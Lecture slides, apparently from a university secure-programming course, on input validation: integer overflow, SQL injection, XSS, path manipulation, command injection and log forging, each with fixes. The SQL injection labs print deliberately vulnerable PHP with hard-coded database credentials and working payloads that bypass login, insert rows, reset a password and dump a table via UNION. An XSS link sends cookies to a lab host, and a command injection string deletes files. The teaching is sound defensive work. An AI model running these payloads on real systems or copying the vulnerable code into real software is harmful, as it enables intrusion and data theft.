S ECURE P ROGRAMMING 5. H ANDLING I NPUT (P ART 2) Chih Hung Wang Reference: 1. B. Chess and J....

transcript

SECURE PROGRAMMING

5. HANDLING INPUT (PART 2)

Chih Hung Wang

Reference:1. B. Chess and J. West, Secure Programming with Static Analysis, Addison-Wesley, 2007.2. R. C. Seacord, Secure Coding in C and C++, Addison-Wesley, 2006.

How to Validate – More Detail (20)

Make Good Input Validation the Default (1) Instead of coding up a new solution to the input

validation problem every time, arrange your program so that there is a clear, consistent, and obvious place for input validation.

This means creating a layer of abstraction on top of the system libraries the program uses to get input. Make good input validation the default by creating a layer of functions or methods that replace the built-in ones. We call this a security-enhanced API.

Make Good Input Validation the Default (2)

A Secure-enhanced API

Make Good Input Validation the Default (3)

How to Validate – More Detail (24) readlink() problem (1)

readlink() problem (2)

The off-by-one error in readlink()

The wrapper for readlink() --(1)

The wrapper for readlink() --(2)

Code that implements the same functionality as strncpy but adds the property that destination string will always be null-terminated.

Continuous…

Wrapper methods around Session.setAttribute() make it hard to forget about input validation.

Example 5.22 shows what can happen when a security-enhanced API isn’t adopted. The code reads three Boolean values in three different ways.

How to Validate – More Detail (33) Check Input Length

Checks for reasonable maximum input length can make it harder for an attacker to exploit other vulnerabilities in the system.

Bad codes

Better… C

Java does bounds checking And enforces type safety Low-memory condition

Bound Numeric Input (1) Check numeric input against both a maximum

value and a minimum value as part of input validation.

Bound Numeric Input (2) An implicit conversion from a signed value to an

unsigned value. A negative argument to doAlloc() results in malloc() attempting to allocate a very large amount of memory.

Bound Numeric Input (3) An implicit conversion from an unsigned value to

a signed value. getFileSize() returns a signed value, but it takes its return value from an unsigned struct field. This causes the value returned from getFileSize() to be negative for files larger than 2GB.

How to Validate – More Detail (37)-1

Integer Error Signed and Unsigned

Integer Range

Signed and Unsigned Overflow

See signed_pb.c

Integer Overflow Vulnerability

Note: Cannot run in ubuntu GCC

Another Case (run in Windows XP)

#include <stdio.h>#include <malloc.h>#include <string.h>

void getComment(unsigned short len, char *src){ //int i; unsigned short size, as;

size=len - 2; as=size+1; char *comment = (char*)malloc(size+1);

//for(i=0;i<size/100;i++) //comment[i]=src[i];

memcpy(comment, src, size); printf("%s\n", comment); printf("%u\n", size+1); printf("%u\n", as); return;}

int main(){ char cmm[65535]; int i; for(i=0;i<65534;i++) cmm[i]='c';

getComment(1, cmm);

See sign_error3.c

A good example of Integer Overflow

See integer_over.c

Preventing Metacharacter Vulnerabilities (1)

Many metacharacter problems: Use parameterized commands. We continue the SQL example there. Then we look at three other types of metacharacter vulnerabilities: Path manipulation Command injection Log forging

Use Parameterized Requests (1) SQL Injection attack

Use Parameterized Requests (2) SQL injection attack example

which is the same as

Use Parameterized Requests (3)

Treated as comments

Use Parameterized Requests (4)

Using a parameterized query helps prevent SQL injection

However, parameterized SQL does not guarantee that SQL injection is impossible. We’ve seen situations in which programmers were told “Use prepared statements for security reasons” but weren’t told what those security reasons are.

Preventing SQL injection can also be viewed as an input validation problem. A programmer might accept characters only from a whitelist of safe values or identify and escape a blacklist of potentially malicious values.

Again, blacklisting is riddled with loopholes that make it ineffective at preventing SQL injection attacks. For example, attackers can: Target fields that are not quoted Find ways to bypass the need for certain escaped

metacharacters Use stored procedures to hide the injected

metacharacters

SQL Injection Real Case (1)

Install Apache 、 PHP and mysql

http://120.113.173.21/sqj1.php

SQL Injection Real Case (2) Source code (sqj1.php)<?php

if (isset($_POST["login"])){

$link = mysql_connect('localhost', 'secpro', 'Snsysu001');mysql_set_charset('utf8', $link);$db_selected = mysql_select_db('Secure_Programming_Test', $link);

$query = "SELECT * FROM member WHERE username='" . $_POST["username"] . "' AND password='" . $_POST["password"] . "'";

$result = mysql_query($query) or die("MySQL Query Error : " . mysql_error() . " SQL: " . $query);

$match_count = mysql_num_rows($result);

if ($match_count) {

mysql_free_result($result);

mysql_close($link);header("Location: http://140.130.175.123/sqj1_s.php?user=" .

$_POST["username"]);}else{

header("Location: http://" . $_SERVER["HTTP_HOST"] . $_SERVER["SCRIPT_NAME"]);

SQL Injection Real Case (3) Source code-cont. (sqj1.php)<html>

<head><title>SQL Injection Test 1</title></head><body><div style="text-align: center;"><span><big style="font-weight: bold; color: red;"><big><big>SQL Injection 練習 </big></big></big><br><br>請輸入登入的帳號與密碼 </span><br></div><br><form method="post" name="form1" id="form1"><table align="center"> <tbody> <tr> <td align="left" valign="top"> <div> UserID <input name="username" id="username" type="text"> </div> </td> <td align="left" valign="top"> <div> Password <input name="password" id="password" type="password"> </div> </td> <td align="center" valign="middle"> <input name="login" id="login" value="Login" type="submit"> </td> </tr> </tbody></table></form><div style="text-align: center;"><br><span style="font-weight: bold; color: rgb(0, 102, 0);"> 請勿隨意嘗試 SQL Injection 攻擊 </span><br style="font-weight: bold; color: rgb(0, 102, 0);"><span style="font-weight: bold; color: rgb(0, 102, 0);"> 密碼錯誤三次將會暫停使用 </span></div></body></html>

SQL Injection Real Case (4) Source code (sqj1_s.php)

<html><head><title>SQL Injection Pass</title></head><body><div style="color: red;" align="center"><big><big> <span><spanstyle="font-weight: bold;"> 歡迎！你已進入 SQL Injection 測試成功網頁</span> </span></big></big></div><p> </p><center><span style="font-weight: bold; color: rgb(0, 0, 153);"> 你的帳戶 :</span><?php echo $_GET["user"]; ?></center></body></html>

SQL Injection Real Case (5) Using phpmyadmin (http://www.phpmyadmin.net/

) Connect the database

http://120.113.173.21/phpmyadmin/

Database: Secure_Programming_Test Table: member

Fields: id 、 username and password username=test1 password=mytest

A successful login

Using SQL Injection attack Enter ' OR '1' = '1 into both username and

password

See the followings: SELECT * FROM member WHERE username='' OR

'1' = '1' AND password='' OR '1' = '1';

Enter username: attacker and password: ' OR '1' = '1 . The login is also successful.

See the followings: SELECT * FROM member WHERE

username='attacker' AND password='' OR '1' = '1';

SQL Injection Real Case (10) Another method: UserID ： ' OR '1'='1' -- and

password: any string.

See the followings: SELECT * FROM member WHERE username='' OR

'1'='1' -- ' AND password='asdfgh'; -- denotes the comments

SQL Injection can perform Insert, Delete, Update, etc. commands.

sqj2.php can use the method of mysqli_multi_query.

SQL Injection Real Case (12) Source code (sqj2.php)<?php

if (isset($_POST["login"])){

$link = mysqli_connect('localhost', 'secpro', 'Snsysu001');mysqli_set_charset('utf8', $link);$db_selected = mysqli_select_db($link, 'Secure_Programming_Test');

$result = mysqli_multi_query($link, $query) or die("MySQL Query Error : " . mysqli_error($link) . " SQL: " . $query);

$match = mysqli_store_result($link);

if (mysqli_fetch_row($match)) {

mysqli_free_result($result);

mysqli_close($link);header("Location: http://140.130.175.123/sqj2_s.php?user=" .

SQL Injection Real Case (13) Source code –cont. (sqj2.php)<html>

<head><title>SQL Injection Test 2</title></head><body><div style="text-align: center;"><span><big style="font-weight: bold; color: red;"><big><big>SQL Injection 練習 2 ( 多指令查詢 )</big></big></big><br><br>請輸入登入的帳號與密碼 </span><br></div><br><form method="post" name="form1" id="form1"><table align="center"> <tbody> <tr> <td align="left" valign="top"> <div> UserID <input name="username" id="username" type="text"> </div> </td> <td align="left" valign="top"> <div> Password <input name="password" id="password" type="password"> </div> </td> <td align="center" valign="middle"> <input name="login" id="login" value="Login" type="submit"> </td> </tr> </tbody></table></form><div style="text-align: center;"><br><span style="font-weight: bold; color: rgb(0, 102, 0);"> 請勿隨意嘗試 SQL Injection 攻擊 </span><br style="font-weight: bold; color: rgb(0, 102, 0);"><span style="font-weight: bold; color: rgb(0, 102, 0);"> 密碼錯誤三次將會暫停使用 </span></div></body></html>

SQL Injection Real Case (14) Source Code (sqj2_s.php)

<html><head><title>SQL Injection Pass</title></head><body><div style="color: red;" align="center"><big><big> <span><spanstyle="font-weight: bold;"> 歡迎！你已進入 SQL Injection 2 ( 多指令查詢 ) 測試成功網頁 </span> </span></big></big></div><p> </p><center><span style="font-weight: bold; color: rgb(0, 0, 153);"> 你的帳戶 :</span><?php echo $_GET["user"]; ?></center></body></html>

See the following attack: Username ： ' OR '1'='1'; INSERT INTO member

(username, password) VALUES ('haha', 'haha') -- Any string of password

SQL Injection Real Case (16) The attacker can perform “error testing”

$result = mysqli_multi_query($link, $query)

or die("MySQL Query Error : " . mysqli_error($link) . " SQL: " . $query); ' OR '1'='1' abcd (username) Any password

sqj2.php crack!

Successful!

SQL Injection Real Case (19) Check the database

SQL Injection Real Case (20) Update the data in the database

' OR '1'='1'; UPDATE member SET password='hacker007' WHERE username='test1' --

Any password The password of test1 has been modified.

SQL Injection Prevention (1)

Using the blacklist method It is not a good method. There are many kinds of attacking patterns. For example, only filter the ‘OR’.

SQL Injection Prevention (2) Source code (part) (sqj3.php)

if (preg_match('/OR/', $_POST['username']) || preg_match('/or/', $_POST['username']) || preg_match('/Or/', $_POST['username'])|| preg_match('/oR/', $_POST['username'])) die("Error!!! SQL Injection Attack!!"); if (preg_match('/OR/', $_POST['password']) || preg_match('/or/', $_POST['password']) || preg_match('/Or/', $_POST['password'])|| preg_match('/oR/', $_POST['password'])) die("Error!!! SQL Injection Attack!!");

Disadvantages: The username has the patterns of OR/or/Or/oR Mysql can use “||” Enter ' || '1' = '1' -- as the username

Better approach: Prepared statements “?” (question mark) placeholder

SELECT * FROM member WHERE username= ?1 AND password= ?

Interpret SQL

?1=test1 ?2=mytest

SELECT * FROM member WHERE username= 'test1' AND

password= 'mytest'

Set the variables

Execute!

SQL Injection Prevention (6) Source Code Part (sqj4.php)

$stmt=mysqli_prepare($link, "SELECT * FROM member WHERE username= ? AND password= ?"); mysqli_stmt_bind_param($stmt, 'ss', $_POST["username"], $_POST["password"]); $result = mysqli_stmt_execute($stmt); //or die("MySQL Query Error : " . mysql_error());

$match = mysqli_stmt_store_result($stmt);

if (mysqli_stmt_num_rows($stmt)) {

mysqli_stmt_close($stmt);mysqli_close($link);header("Location: http://140.130.175.123/sqj4_s.php?user=" .

Test ‘ OR ’1‘=’1‘ -- or ' || '1'='1' – Cannot pass the verification!

SQL Injection: Stealing the sensitive data from database (1)

See the example sqj5.php

<?phpif (isset($_POST["search"])){ $link = mysql_connect('localhost', 'secpro', 'Snsysu001');

mysql_set_charset('utf8', $link);$db_selected = mysql_select_db('Secure_Programming_Test',

$link);

$query = "SELECT * FROM mybook WHERE title='" . $_POST["title"] . "'"; $result = mysql_query($query);

//or die("MySQL Query Error : " . mysql_error() . " SQL: " . $query);

$match_count = mysql_num_rows($result); }

Sqj5.php

SQL Injection: Stealing the sensitive data from database (3)<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf8"><title>SQL Injection 5</title></head><body><div style="font-weight: bold; color: red;" align="center"><big> <spanclass="style1"><big> 歡迎 ! 這是 SQL Injection 測試網頁 5 ( 竊取資料庫內的資料範例 )</big> </span></big></div><p> </p> <font size="6"><b> BOOK Search </b> </font> <br> <form method="post" name="form1" id="form1"><input name="title" type="text" id="title" value="<?php echo $_POST["title"];?>" /><input type="submit" name="search" id="search" value="Search" /></form>

<?php if (isset($_POST["search"])){ ?><p><table border=1><tr><th>BookID</th><th>Title</th><th>Authors</th><th>Publisher</th><th>Year</th><th>Price</th></tr>

Sqj5.php Cont.

<?php}

for ($i = 0; $i < $match_count; $i++) { $row = mysql_fetch_row($result); echo "<tr>\n"; for ($j = 0; $j < 6; $j++) { echo "<td>" . $row[$j] . "</td>\n"; } echo "</tr>\n"; } mysql_free_result($result);

mysql_close($link); ?></table> </body></html>

Sqj5.php Cont.

mybook Table

Using union: ' union select *, null, null, null from member --

See the following attack result

Simple XSS Attack

See demo

xsstest1.html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<head>

<title>xsstest1</title>

</head>

<body>

<a href="http://140.130.175.123/xsstest1.php?user=<script>document.location='http://140.130.175.123/xsstest1-1.php?cookie='%2Bdocument.cookie;</script>">

Press me!

</body>

</html>

Path Manipulation (1) If user input is allowed to include file system metacharacters

such as a forward slash (/), backslash (\), or period (.), an attacker might be able to specify an absolute path where a relative path is expected or traverse the file system to an unintended location by moving up the directory tree. Unauthorized file system access of this type is called path manipulation.

The programmer has not considered the possibility that an attacker could provide a filename such as ../../tomcat/conf/server.xml, which causes the application to delete one of its own configuration files.

Path Manipulation (2)

This code uses a whitelist to prevent path manipulation.

Command Injection (1)

If user input is allowed to specify system commands your program executes, attackers might be able to cause the system to carry out malicious commands on their behalf.

The problem is that the program does not do any validation on the backuptype parameter read from the user. Typically, the Runtime.exec() method will not execute multiple commands, but in this case, the program first runs the cmd.exe shell in order to run multiple commands with a single call to Runtime.exec().

When the shell is invoked, it will happily execute multiple commands separated by two ampersands. If an attacker passes a string of the form "&& del c:\\dbms\\*.*", the application will execute this command along with the others specified by the program.

This code uses a whitelist to prevent command injection.

Log Forging (1) Logs are a target for attackers. If attackers can control a value that is written to the

log, they might be able to fabricate events on the system by including entire falsified log entries in the input they provide.

A log forging vulnerability caused by unvalidated input read from an HTTP request.

Log Forging (2)

If a user submits the string "twenty-one" for val, the following entry is logged: INFO: Failed to parse val=twenty-one

However, if an attacker submits the string "twenty-one%0a%0aINFO:+User+logged+out%3dbadguy",

The following entry is logged: INFO: Failed to parse val=twenty-one INFO: User logged out=badguy

Clearly, attackers can use this same mechanism to insert arbitrary log entries.

Log Forging (3)

One way to prevent log forging vulnerabilities is to encode data before going to the log file. Example 5.37 repairs the code in Example 5.35 by URL-encoding the request data before logging them.

Summary

It’s easy to say “Don’t trust input,” but it takes real effort to determine all the implicit ways a program might be putting unwarranted faith in some aspect of its input. Identify all the program’s input sources. Choose the right approach to performing input

validation. Track which input values have been validated

and what properties that validation checked. Keep an eye out for the way different

components interpret the data your program pass along.

S ECURE P ROGRAMMING 5. H ANDLING I NPUT (P ART 2) Chih Hung Wang Reference: 1. B. Chess and J....

Documents